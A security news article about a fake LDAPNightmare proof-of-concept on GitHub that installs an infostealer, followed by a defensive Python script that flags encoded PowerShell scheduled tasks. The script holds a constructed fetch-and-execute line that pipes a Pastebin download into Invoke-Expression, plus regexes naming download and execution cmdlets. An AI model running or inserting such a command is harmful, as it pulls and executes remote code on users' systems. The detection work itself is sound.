Beware: Fake LDAPNightmare Exploit on GitHub Infects Users with Infostealer Malware!

2025-01-11

Author: Mei

In a shocking revelation, security experts from Trend Micro have uncovered a deceptive proof-of-concept (PoC) exploit for CVE-2024-49113, also known as "LDAPNightmare," hosted on GitHub that spreads infostealer malware. This malicious tool lures unsuspecting users with promises of legitimate testing capabilities, only to infect their systems and exfiltrate sensitive data to an external FTP server.

This troubling tactic is not new, as a variety of malicious applications have previously masqueraded as PoC exploits on GitHub. However, the newly discovered case underscores a persistent trend among cybercriminals who cleverly exploit user trust to propagate malware.

The Deceptive Strategy

Trend Micro's investigation revealed that the deceptive GitHub repository appears to have been forked from a legitimate PoC provided by SafeBreach Labs, who originally released their research on January 1, 2025, regarding CVE-2024-49113. This vulnerability is one of two flaws affecting the Windows Lightweight Directory Access Protocol (LDAP); the other, CVE-2024-49112, is a critical flaw that allows remote code execution.

In a twist, SafeBreach initially misidentified the nature of their PoC in an earlier blog post, mixing up the vulnerabilities, which led to increased public interest in LDAPNightmare. Cybercriminals have leveraged this confusion to deceive users into downloading their malicious software.

The Malicious Payload

Users who download the exploit from the fake repository are greeted with a UPX-packed executable named 'poc.exe'. Upon execution, this executable drops a PowerShell script into the victim's temporary folder. This script sets up a scheduled task on the compromised machine that runs an encoded script, which in turn fetches a third script from the popular code-sharing site Pastebin.

The final payload is alarming, as it methodically collects a variety of sensitive information including system data, process lists, directory structures, IP addresses, and installed updates—eventually packaging the stolen data into ZIP files before transmitting it to a hardcoded external FTP server.
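As an added example (not part of this report or of Trend Micro's analysis), the following Python triage check inspects an exported Task Scheduler definition for the persistence pattern described above: a PowerShell action carrying an encoded command whose decoded text pulls a further stage from Pastebin. It assumes the encoding is PowerShell's -EncodedCommand form (base64 of UTF-16LE text), which the report does not state, and the task XML samples it tests against are constructed, not taken from the real malware.

```python
import base64
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
# PowerShell accepts -e, -ec, -enc and -EncodedCommand; the value is base64 of UTF-16LE text.
ENCODED_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
REMOTE_FETCH = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|invoke-expression|\biex\b", re.I)

def decode_encoded_command(arguments: str):
    """Return the script hidden behind -EncodedCommand, or None if there is none."""
    m = ENCODED_FLAG.search(arguments)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None  # malformed base64 / odd-length UTF-16LE: nothing we can decode

def triage_task_xml(xml_text: str) -> list:
    """Return findings for one exported Task Scheduler XML definition."""
    findings = []
    root = ET.fromstring(xml_text)
    for exec_node in root.findall(".//t:Actions/t:Exec", NS):
        command = exec_node.findtext("t:Command", default="", namespaces=NS).lower()
        arguments = exec_node.findtext("t:Arguments", default="", namespaces=NS)
        if "powershell" not in command and "pwsh" not in command:
            continue
        decoded = decode_encoded_command(arguments)
        if decoded is None:
            continue
        findings.append("encoded PowerShell command")
        if "pastebin.com" in decoded.lower():  # staging site named in the report
            findings.append("decoded script references pastebin.com")
        if REMOTE_FETCH.search(decoded):
            findings.append("decoded script fetches or evaluates remote content")
    return findings

def task_xml(command: str, arguments: str) -> str:
    """Build a minimal task definition (constructed sample, not the real malware's task)."""
    return (f'<Task xmlns="{NS["t"]}"><Actions><Exec><Command>{command}</Command>'
            f"<Arguments>{arguments}</Arguments></Exec></Actions></Task>")

# Constructed samples: one mimics the chain described above, the other is a harmless task.
STAGE2 = "Invoke-WebRequest https://pastebin.com/raw/PLACEHOLDER | Invoke-Expression"
ENCODED = base64.b64encode(STAGE2.encode("utf-16le")).decode()
SUSPICIOUS_TASK = task_xml("powershell.exe", f"-NoP -W Hidden -EncodedCommand {ENCODED}")
BENIGN_TASK = task_xml("cmd.exe", "/c dir C:\\")
```

Run it over task definitions exported with `schtasks /query /xml` (or the XML files under the Tasks folder) to surface tasks worth a closer look; the same decode step applies to encoded commands seen in process-creation logs.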

Protect Yourself!

Cybersecurity experts strongly advise users seeking public exploits for research or testing purposes to exercise extreme caution. When browsing repositories, it’s essential to verify the authenticity of the source—especially since some threat actors have been known to impersonate reputable security researchers.

To mitigate risks, always review any code before executing it, use services like VirusTotal to scan binaries, and steer clear of any suspicious or obfuscated files.

Stay Informed

For those wanting to gauge the extent of this threat, a list of indicators of compromise related to this attack is available through various cybersecurity channels. Remember, while researching exploits is vital for security improvement, trusting the wrong source can lead to disastrous consequences. Stay safe and validate before you act!